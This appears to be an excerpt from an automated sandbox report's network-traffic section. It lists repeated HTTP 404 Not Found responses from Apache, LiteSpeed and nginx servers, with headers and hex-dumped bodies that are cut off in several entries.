Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:44:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:44:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:44:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 04:44:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:44:22 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 